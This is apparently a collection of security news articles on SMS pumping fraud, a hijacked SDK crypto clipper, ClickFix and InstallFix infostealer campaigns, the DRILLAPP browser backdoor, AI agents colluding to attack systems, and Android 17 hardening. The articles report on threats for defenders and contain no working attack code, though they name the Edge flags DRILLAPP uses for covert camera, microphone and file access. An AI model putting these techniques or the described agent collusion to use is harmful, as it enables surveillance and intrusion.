In these attacks, attributed to O-UNC-036 , the threat actors rely on disposable email addresses in order to execute SMS pumping attacks, also called International Revenue Sharing Fraud (IRSF). “In this scheme, malicious actors automate the creation of puppet accounts in a targeted service provider,” Okta said . “Fraudsters use these account registrations to trigger SMS messages to premium rate phone numbers and profit from charges incurred. This activity can prove costly for service providers who use SMS to verify registration information in customer accounts or to send multi-factor authentication (MFA) security codes.” O-UNC-036 has also been linked to a cybercrime-as–a-service (CaaS) ecosystem that provides paid infrastructure and services to facilitate online fraud.
The web-based storefronts are hosted in Vietnam and specialize in the sales of web-based accounts. Hijacked AppsFlyer SDK Distributes Crypto Clipper — The AppsFlyer Web SDK was briefly hijacked to serve malicious code to steal cryptocurrency in a supply chain attack. The clipper malware payload came with capabilities to intercept cryptocurrency wallet addresses entered on websites and replace them with attacker-controlled addresses to divert funds to the threat actor. “The AppsFlyer Web SDK was observed serving obfuscated malicious JavaScript instead of the legitimate SDK from websdk.appsflyer[.]com,” Profero said .
“The malicious payload appears to have been designed for stealth and compatibility, preserving legitimate SDK functionality while adding hidden browser hooks and wallet-hijacking logic.” The incident has since been resolved by AppsFlyer. Operation CamelClone Targets Government and Defense Entities — A new cyber espionage campaign dubbed Operation CamelClone has targeted governments and defense entities in Algeria, Mongolia, Ukraine, and Kuwait using malicious ZIP archives that contain a Windows shortcut (LNK) file, which, when executed, delivers a JavaScript loader named HOPPINGANT. The loader then delivers additional payloads for establishing C2 and exfiltrating data to the MEGA cloud storage service. “One interesting aspect of this campaign is that the threat actor does not rely on traditional command-and-control infrastructure,” Seqrite Labs said .
“Instead, the payloads are hosted on a public file-sharing service, filebulldogs[.]com, while stolen data is uploaded to MEGA storage using the legitimate tool Rclone.” The activity has not been attributed to any known threat group. How Threat Actors Exfiltrate Credentials Using Telegram Bots — Threat actors are abusing the Telegram Bot API to exfiltrate data via text messages or arbitrary file uploads, highlighting how legitimate services can be weaponized to evade detection. Agent Tesla Keylogger is by far the most prominent example of a malware family that uses Telegram for C2. “In general, Telegram C2s appear to be most popular among information stealers, possibly due to Telegram’s technically legitimate nature and because information stealers typically only need to exfiltrate data passively rather than provide complex communications beyond simple message or file transfers,” Cofense said .
Microsoft Launches Copilot Health — Microsoft has become the latest company after OpenAI and Anthropic to launch a dedicated “secure space” called Copilot Health that integrates medical records, biometric data from wearables, and lab test results to give personalized advice in the U.S. “Copilot Health brings together your health records, wearable data, and health history into one place, then applies intelligence to turn them into a coherent story,” the company said . Like OpenAI and Anthropic, Microsoft emphasized that Copilot Health isn’t meant to replace professional medical care. Rogue AI Agents Can Work Together to Engage in Offensive Behaviors — According to a new report from artificial intelligence (AI) security company Irregular, agents can work together to hack into systems, escalate privileges, disable endpoint protection, and steal sensitive data while evading pattern-matching defenses.
What’s notable is that the experiment did not rely on adversarial prompting or deliberately unsafe system design. “In one case, an agent convinced another agent to carry out an offensive action, a form of inter-agent collusion that emerged with no external manipulation,” Irregular said . “This scenario demonstrates two compounding risks: inter-agent persuasion can erode safety boundaries, and agents can independently develop techniques to circumvent security controls. When an agent is given access to tools or data, particularly but not exclusively shell or code access, the threat model should assume that the agent will use them, and that it will do so in unexpected and possibly malicious ways.” 🔧 Cybersecurity Tools Dev Machine Guard → It is a free, open-source tool that scans your computer to show you exactly what developer tools and scripts are running.
It creates a simple list of your AI coding assistants, code editor extensions, and software packages to help you find anything suspicious or outdated. It is a single script that works in seconds to give you better visibility into the security of your local coding environment. Trajan → It is an automated security tool designed to find hidden vulnerabilities in “service meshes,” which are the systems that manage how different parts of a large software application talk to each other. Because these systems are complex, it is easy for engineers to make small mistakes in the settings that allow hackers to bypass security or steal data.
Trajan works by scanning these configurations to spot those specific errors and helping developers fix them before they can be exploited. Disclaimer: For research and educational use only. Not security-audited. Review all code before use, test in isolated environments, and ensure compliance with applicable laws.
Conclusion There’s a lot packed in here, and not in a neat way. Some of it is the usual recycled chaos, some of it feels a little more deliberate, and some of it has that nasty “this is going to show up everywhere by next week” energy. Anyway — enough throat-clearing. Here’s the stuff worth your attention.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Why Security Validation Is Becoming Agentic
If you run security at any reasonably complex organization, your validation stack probably looks something like this: a BAS tool in one corner. A pentest engagement, or maybe an automated pentesting product, in another. A vulnerability scanner feeding an attack surface management platform somewhere else. Each tool gives you a slice of the picture.
None of them talks to each other in any meaningful way. Meanwhile, adversaries do not attack in silos. A real intrusion might chain together an exposed identity, a cloud misconfiguration, a missed detection opportunity, and an unpatched vulnerability in a single operation. Attackers understand that your environment is an interconnected system.
Unfortunately, most validation programs are still treating it as a set of disparate, disconnected parts. This isn’t a minor inefficiency. It’s a structural blind spot. And it’s lasted for years because the market has treated every validation discipline as a separate category, with its own vendors, consoles, and its own separate, and very limited risk assessments.
As autonomous AI agents become capable of planning, executing, and reasoning across complex workflows, security validation must enter a new phase. The emerging discipline of Agentic Exposure Validation points toward something far more coordinated and capable than today’s fragmented, manual validation cycles. It promises continuous, context-aware, autonomous validation that better matches how modern threats usually unfold. What Security Validation Actually Means Today For years, security validation has been treated primarily as an attack simulation.
You deployed agents, ran scenarios, and got a report showing what was blocked and what wasn’t. Today, that’s no longer enough. Modern security validation spans three distinct perspectives. Taken together, they give defenders a much more realistic view of their holistic security posture.
The Adversarial Perspective asks, “How can an attacker actually get into our environment?” This involves automated pentesting and attack path validation, which focuses on identifying exploitable vulnerabilities and mapping the easiest routes to critical assets. The Defensive Perspective asks, “Can we actually stop them?” This includes security control validation and detection stack validation, which ensure that your firewalls, EDR, IPS, WAF, SIEM rules, and alerting systems perform as expected against real threats. The Risk Perspective asks, “Does this exposure actually matter?” This involves exposure prioritization, guided by compensating controls, which filter out theoretical risks and focus remediation on the vulnerabilities that are genuinely exploitable in your specific environment. Any one of these perspectives on its own leaves dangerous gaps.
The next evolution of security validation will be defined by its convergence into a unified validation discipline. Agentic AI is a Game Changer for Defenders Today, almost every cybersecurity vendor claims to be AI-powered. In many cases, that simply means a language model has been added to a dashboard to summarize findings or generate reports. And while “AI-assisted” may be useful, it’s definitely not transformative.
Agentic AI is a fundamentally different proposition. An AI wrapper is basically a simple app that calls an AI model and presents the output. It might format, summarize, or repackage the response, but it doesn’t actually manage the task itself. Agentic AI, on the other hand, takes ownership of the entire task from start to finish.
It figures out what needs to be done, carries out the steps, evaluates the results, and adjusts if necessary without a human needing to direct each step along the way. In security validation, the difference is both massive and immediate. Consider what happens today when a critical threat makes the news. Someone on the team reads the advisory, determines which of the organization’s systems might be exposed, builds or adapts test scenarios, runs them, reviews the results, and then decides what needs remediation.
Even in strong teams, this can take days. If the threat is complex, it can stretch into weeks. Agentic AI can compress that workflow into minutes. Not because someone wrote a faster script, but because an autonomous agent handled the full sequence.
It analyzed the threat, mapped it to the environment, selected relevant assets and controls, ran the right validation workflows, interpreted the results, and surfaced what mattered most. This is how agentic AI balances the scales. It’s not just about speed. It’s about replacing disconnected, human-driven validation steps with autonomous, coordinated, end-to-end reasoning.
The Real Constraint Isn’t the Model. It’s the Data. This is where a lot of the AI discussion goes wrong. Agentic systems are only as strong as the environment they can reason over.
An autonomous agent that runs generic attack simulations against a generic model will produce generic results. That may look impressive in a demo, but it doesn’t help a security team make confident decisions in production. The real differentiator is context. This is why the underlying data architecture matters more than the model alone.
To make agentic validation useful, organizations need a unified security data layer that continuously reflects what exists, what’s exposed, and what’s actually working. You can think of this as a Security Data Fabric , built from three essential dimensions. Asset Intelligence covers the full inventory of your environment: servers, endpoints, users, cloud resources, applications, and containers, as well as their relationships. Because you can’t validate what you can’t see.
Exposure Intelligence encompasses vulnerabilities, misconfigurations, identity risks, and other weaknesses across your attack surface. This is the raw material that attackers work with. Security Control Effectiveness is the dimension that most organizations are missing entirely. It is not enough to know that you’ve deployed a firewall or an EDR agent.
You need to know, with evidence, whether these controls will actually block the specific threats that are targeting your specific assets. When these dimensions come together, the result is more than an asset database or vulnerability feed. It becomes a living model of the organization’s minute-to-minute security reality. That model changes as the environment changes.
New assets appear. New vulnerabilities are disclosed. Controls are reconfigured. New threats emerge.
And that is exactly the context the agentic AI needs. With a rich security data fabric behind it, an agentic AI is no longer running one-size-fits-all tests. It can tailor validation to actual topology, your organization’s actual crown jewels, its actual control coverage, and actual attack paths. That is the difference between hearing “this CVE is critical” and learning “this CVE is critical on this server, your controls don’t block exploitation, and there’s a validated path to one of your most sensitive business systems.” Where Security Validation Is Headed The future of security validation is clear.
Periodic testing is becoming continuous validation. Manual effort is evolving into autonomous operation. Point products are consolidating into unified platforms. And reporting problems is morphing into enabling better security decisions.
Agentic AI is the catalyst, but it only works with the right foundation. Autonomous agents need real context: an accurate, connected view of the environment, not a fragmented set of tools and findings. When agentic workflows, rich context, and unified validation come together, the result is a fundamentally different model. Instead of waiting for someone to ask whether the organization is protected, the system continuously answers that question with evidence grounded in how even the latest attacks are actually happening.
The market is already validating this shift. In Frost & Sullivan’s Frost Radar: Automated Security Validation, 2026 , Picus Security was named the Innovation Index Leader , with its agentic capabilities and CTEM-native architecture highlighted as key differentiators. Get your demo today to discover how Picus helps organizations unify adversarial, defensive, and risk validation in a single platform. Note: This article was written by Huseyin Can YUCEEL, Security Research Lead at Picus Security.
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
ClickFix Campaigns Spread MacSync macOS Infostealer via Fake AI Tool Installers
Three different ClickFix campaigns have been found to act as a delivery vector for the deployment of a macOS information stealer called MacSync . “Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands – making it particularly effective against users who may not appreciate the implications of running unknown and obfuscated terminal commands,” Sophos researchers Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey said . It’s currently not known if the campaigns are the work of the same threat actor. The use of ClickFix lures to distribute the malware was also flagged by Jamf Threat Labs in December 2025.
The details of the three campaigns are as follows - November 2025: A campaign that used OpenAI’s ChatGPT Atlas web browser as bait, delivered via sponsored search results on Google, to direct users to a fake Google Sites URL with a download button that, when clicked, displayed instructions to open the Terminal app and paste a command to it. This action downloaded a shell script, which prompts the user to enter the system password and runs MacSync with user-level permissions. December 2025: A malvertising campaign that leveraged sponsored links tied to searches for queries like “how to clean up your Mac” on Google to lead users to shared conversations on the legitimate OpenAI ChatGPT site to give the impression that the links were safe. The ChatGPT conversations redirected victims to malicious GitHub-themed landing pages that tricked users into running malicious commands on the Terminal app.
February 2026: A campaign targeting Belgium, India, and parts of North and South America that distributed a new variant of MacSync delivered through ClickFix lures. The latest iteration supports dynamic AppleScript payloads and in-memory execution to evade static analysis, bypass behavioral detections, and complicate incident response. The shell script launched after running the Terminal command is designed to contact a hard-coded server and retrieve the AppleScript infostealer payload, while simultaneously taking steps to remove evidence of data theft. The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.
The latest findings suggest the threat actors are adapting the formula to stay one step ahead of security tools, while weaponizing the trust associated with ChatGPT conversations to convince users to run malicious commands. The new variant observed in the most recent campaign “likely represents the malware developer adjusting to OS and software security measures to maintain effectiveness,” Sophos said. “Refinements to the typical ClickFix social engineering tactics are therefore one way in which such campaigns may continue to evolve in the future.” In recent months, ClickFix campaigns have used legitimate platforms like Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne to host bogus instructions for installing developer tools like Anthropic’s Claude Code. The URLs are distributed via malicious search engine ads.
The instructions, as before, deceive victims into installing infostealer malware like Amatera Stealer instead. The social engineering attack has been codenamed InstallFix or GoogleFix . According to Nati Tal, head of Guardio Labs, similar infection chains lead to the deployment of Alien infostealer on Windows and Atomic Stealer on macOS. The PowerShell command executed after pasting and running the supposed installation command for Claude Code fetches a legitimate Chrome extension package within a malicious HTML Application (HTA) file, which then launches an obfuscated .NET loader for Alien in memory, per Tal.
“While traditional ClickFix attacks need to manufacture a reason for the user to run a command: a fake CAPTCHA, a fabricated error message, a bogus system prompt — InstallFix doesn’t need any of that,” Push Security said. “The pretext is simply the user wanting to install legit software.” According to Pillar Security, there have been at least 20 distinct malware campaigns that have targeted artificial intelligence (AI) and vibe coding tools between February and March 2026. These include code editors, AI agents, large language models (LLM) platforms, AI-powered browser extensions, AI video generators, and AI business tools. Of these, nine have been found to target both Windows and macOS, with another seven exclusively affecting macOS users.
“The reason is clear: AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials (SSH keys, cloud tokens, cryptocurrency wallets),” Pillar Security researcher Eilon Cohen said . “The ClickFix/InstallFix technique (tricking users into pasting commands into Terminal) is uniquely effective against developers because curl | sh is a legitimate installation pattern. Homebrew, Rust, nvm, and many other developer tools use this exact pattern. The malicious commands hide in plain sight.” Needless to say, the advantage posed by ClickFix (and its variants) has led to the tactic being adopted by multiple threat actors and groups.
This includes a malicious traffic distribution system (TDS) named KongTuke (aka 404 TDS, Chaya_002, LandUpdate808, and TAG-124), which uses compromised WordPress websites and fake CAPTCHA lures to deliver a Python-based trojan called ModeloRAT . The attackers inject malicious JavaScript into legitimate WordPress websites that prompt users to run a PowerShell command responsible for initiating a multi-stage infection process to deploy the trojan. “The group continues to use this method alongside the newer CrashFix technique, which tricks users into installing a malicious browser extension to initiate infection,” Trend Micro said. “The malware specifically checks whether a system is part of a corporate domain and identifies installed security tools before continuing, suggesting a focus on enterprise environments rather than opportunistic infections.” That’s not all.
KongTuke campaigns have also been spotted using DNS TXT records in their ClickFix script. These DNS TXT records stage a command to retrieve and run a PowerShell script. Other ClickFix-style pastejacking attacks that have been detected in the wild are listed below - Using compromised websites to display lures for ClickFix pages that mimic Google’s “Aw Snap!” error or browser updates to distribute droppers, downloaders, and malicious browser extensions. Using ClickFix decoys served via malvertising/phishing links to direct users to malicious pages that lead to the deployment of Remcos RAT.
Using a fake CAPTCHA verification lure on a phony website promoting a $TEMU airdrop scam to trigger the execution of a PowerShell command that runs arbitrary Python code retrieved from a server. Using a bogus website advertising CleanMyMac to trick users into running a malicious Terminal command to deploy a macOS stealer named SHub Stealer and backdoor cryptocurrency wallets such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live to steal the seed phrases. Using a fake CAPTCHA verification lure on compromised websites to run a PowerShell script that delivers an MSI dropper, which then installs the Deno JavaScript runtime to execute obfuscated code that ultimately installs CastleRAT in memory by means of a Python loader named CastleLoader. In a report published last week, Rapid7 revealed that highly trusted WordPress websites are being compromised as part of an ongoing, widespread campaign designed to inject a ClickFix implant impersonating a Cloudflare human verification challenge.
The activity has been active since December 2025. More than 250 infected websites have been identified in at least 12 countries, including Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the U.K., and the U.S. The websites have been identified as regional news outlets and local businesses. The end goal of these lures is to compromise the Windows systems with different stealer malware families: StealC Stealer , an improved version of Vidar Stealer, a .NET stealer dubbed Impure Stealer, and a C++ stealer referred to as VodkaStealer.
The stolen data can then act as a launchpad for financial theft or follow-on attacks. The exact method by which the WordPress sites are hacked is presently not known. However, it’s suspected to involve the exploitation of recently disclosed security flaws in WordPress plugins and themes, previously stolen admin credentials, or publicly accessible wp-admin interfaces. To counter the threat, site administrators are advised to keep their sites up-to-date, use strong passwords for administrative access, set up two-factor authentication (2FA), and scan for suspicious administrator accounts.
“The best defense for individuals browsing the web is to stay cautious, maintain a zero-trust mindset, use reputable security software, and keep themselves up to date with the latest phishing and ClickFix tactics used by malicious actors,” Rapid7 said. “An important takeaway from this report should be that even trusted websites can be compromised and weaponized against unsuspecting visitors.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
DRILLAPP Backdoor Targets Ukraine, Abuses Microsoft Edge Debugging for Stealth Espionage
Ukrainian entities have emerged as the target of a new campaign likely orchestrated by threat actors linked to Russia, according to a report from S2 Grupo’s LAB52 threat intelligence team. The campaign, observed in February 2026, has been assessed to share overlaps with a prior campaign mounted by Laundry Bear (aka UAC-0190 or Void Blizzard) aimed at Ukrainian defense forces with a malware family known as PLUGGYAPE. The attack activity “employs various judicial and charity themed lures to deploy a JavaScript‑based backdoor that runs through the Edge browser,” the cybersecurity company said. Codenamed DRILLAPP , the malware is capable of uploading and downloading files, leveraging the microphone, and capturing images through the webcam by taking advantage of the web browser’s features.
Two different versions of the campaign have been identified, with the first iteration detected in early February. The attack makes use of a Windows shortcut (LNK) file to create an HTML Application (HTA) in the temporary folder, which then loads a remote remote script hosted on Pastefy, a legitimate paste service. To establish persistence, the LNK files are copied to the Windows Startup folder so that they are automatically launched following a system reboot. The attack chain then displays a URL containing lures related to installing Starlink or a Ukrainian charity named Come Back Alive Foundation.
The HTML file is eventually executed via the Microsoft Edge browser in headless mode , which then loads the remote obfuscated script hosted on Pastefy. The browser is executed with additional parameters like –no-sandbox, –disable-web-security, –allow-file-access-from-files, –use-fake-ui-for-media-stream, –auto-select-screen-capture-source=true, and –disable-user-media-security, granting it access to the local file system, as well as camera, microphone, and screen capture without requiring any user interaction. The artifact essentially functions as a lightweight backdoor to facilitate file system access and capture audio from the microphone, video from the camera, and images of the device’s screen all through the browser. It also generates a device fingerprint using a technique called canvas fingerprinting when run for the first time and uses Pastefy as a dead drop resolver to fetch a WebSocket URL used for command‑and‑control (C2) communications.
The malware transmits the device fingerprint data along with the victim’s country, which is determined from the machine’s time zone. It specifically checks if the time zones correspond to the U.K., Russia, Germany, France, China, Japan, the U.S., Brazil, India, Ukraine, Canada, Australia, Italy, Spain, and Poland. If that’s not the case, it defaults to the U.S. The second version of the campaign, spotted in late February 2026, eschews LNK files for Windows Control Panel modules, while keeping the infection sequence largely intact.
Another notable change involves the backdoor itself, which has now been upgraded to allow recursive file enumeration, batch file uploads, and arbitrary file download. “For security reasons, JavaScript does not allow the remote downloading of files,” LAB52 said. “This is why the attackers use the Chrome DevTools Protocol (CDP), an internal protocol of Chromium‑based browsers that can only be used when the –remote-debugging-port parameter is enabled.” It’s believed that the backdoor is still in the initial stages of development. An early variant of the malware detected in the wild on January 28, 2026, has been observed just communicating with the domain “gnome[.]com” instead of downloading the primary payload from Pastefy.
“One of the most notable aspects is the use of the browser to deploy a backdoor, which suggests that the attackers are exploring new ways to evade detection,” the Spanish security vendor said. “The browser is advantageous for this type of activity because it is a common and generally non‑suspicious process, it offers extended capabilities accessible through debugging parameters that enable unsafe actions such as downloading remote files, and it provides legitimate access to sensitive resources such as the microphone, camera, or screen recording without triggering immediate alerts.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Android 17 Blocks Non-Accessibility Apps from Accessibility API to Prevent Malware Abuse
Google is testing a new security feature as part of Android Advanced Protection Mode (AAPM) that prevents certain kinds of apps from using the accessibility services API. The change, incorporated in Android 17 Beta 2, was first reported by Android Authority last week. AAPM was introduced by Google in Android 16, released last year. When enabled , it causes the device to enter a heightened security state to guard against sophisticated cyber attacks.
Like Apple’s Lockdown Mode, the opt-in feature prioritizes security at the cost of diminished functionality and usability so as to minimize the attack surface. Some of the core configurations include blocking app installation from unknown sources, restricting USB data signaling, and mandating Google Play Protect scanning. “Developers can integrate with this feature using the AdvancedProtectionManager API to detect the mode’s status, enabling applications to automatically adopt a hardened security posture or restrict high-risk functionality when a user has opted in,” Google noted in its documentation outlining Android 17’s features. The latest restriction added to the one-tap security setting aims to prevent apps that are not classified as accessibility tools from being able to leverage the operating system’s accessibility services API .
Verified accessibility tools, identified by the isAccessibilityTool=”true” flag , are exempted from this rule. According to Google, only screen readers, switch-based input systems, voice-based input tools, and Braille-based access programs are designated as accessibility tools. Antivirus software, automation tools, assistants, monitoring apps, cleaners, password managers, and launchers do not fall under this category. While AccessibilityService has its legitimate use cases, such as assisting users with disabilities in using Android devices and apps, the API has been extensively abused by bad actors in recent years to steal sensitive data from compromised Android devices.
With the latest change, any non-accessibility app that already has the permission will have its privileges automatically revoked when AAPM is active. Users will also not be able to grant apps permissions to the API unless the setting is turned off. Android 17 also comes with a new contacts picker that allows app developers to specify only the fields they want to access from a user’s contact list (e.g., phone numbers or email addresses) or allow users to share certain contacts with a third-party app. “This grants your app read access to only the selected data, ensuring granular control while providing a consistent user experience with built-in search, profile switching, and multi-selection capabilities without having to build or maintain the UI,” Google said.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.